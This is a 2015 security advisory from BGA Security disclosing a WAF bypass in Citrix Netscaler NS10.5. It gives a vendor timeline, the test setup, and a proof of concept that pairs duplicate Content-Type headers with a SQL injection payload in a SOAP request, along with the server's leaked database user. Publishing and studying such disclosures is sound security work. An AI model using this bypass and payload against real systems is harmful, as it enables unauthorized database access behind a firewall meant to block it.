Citrix Netscaler NS10.5 WAF Bypass

`Document Title:  
============  
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution  
  
Release Date:  
===========  
12 Mar 2015  
  
Product & Service Introduction:  
========================  
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.  
  
Abstract Advisory Information:  
=======================  
BGA Security Team discovered an HTTP Header Pollution  
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)  
  
Vulnerability Disclosure Timeline:  
=========================  
2 Feb 2015 Bug reported to the vendor.  
4 Feb 2015 Vendor returned with a case ID.  
5 Feb 2015 Detailed info/config given.  
12 Feb 2015 Asked about the case.  
16 Feb 2015 Vendor returned "investigating ..."  
6 Mar 2015 Asked about the case.  
6 Mar 2015 Vendor has validated the issue.  
12 Mar 2015 There aren't any fix addressing the issue.  
  
Discovery Status:  
=============  
Published  
  
Affected Product(s):  
===============  
Citrix Systems, Inc.  
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)  
  
Exploitation Technique:  
==================  
Remote, Unauthenticated  
  
  
Severity Level:  
===========  
High  
  
Technical Details & Description:  
========================  
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:  
  
An Apache web server with default configuration on Windows (XAMPP).  
A SOAP web service which has written in PHP and vulnerable to SQL injection.  
Netscaler WAF with SQL injection rules.  
  
First request: ‘ union select current_user,2# - Netscaler blocks it.  
  
Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.  
  
Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.  
  
  
Proof of Concept (PoC):  
==================  
Proof of Concept  
  
Request:  
  
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">  
<soapenv:Header/>  
<soapenv:Body>  
<string>’ union select current_user, 2#</string>   
  
</soapenv:Body>  
</soapenv:Envelope>  
  
Response:  
  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">  
<soap:Body>  
<return xsi:type=“xsd:string”> Name: root@localhost </return>  
</soap:Body>  
</soap:Envelope>  
  
  
Solution Fix & Patch:  
================  
12 Mar 2015 There aren't any fix addressing the issue.  
  
Security Risk:  
==========  
The risk of the vulnerability above estimated as high.  
  
Credits & Authors:  
==============  
BGA Bilgi Güvenliði - Onur ALANBEL  
  
Disclaimer & Information:  
===================  
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.  
  
Domain: www.bga.com.tr  
Social: twitter.com/bgasecurity  
Contact: [email protected]  
  
Copyright © 2015 | BGA  
  
  
  
  
`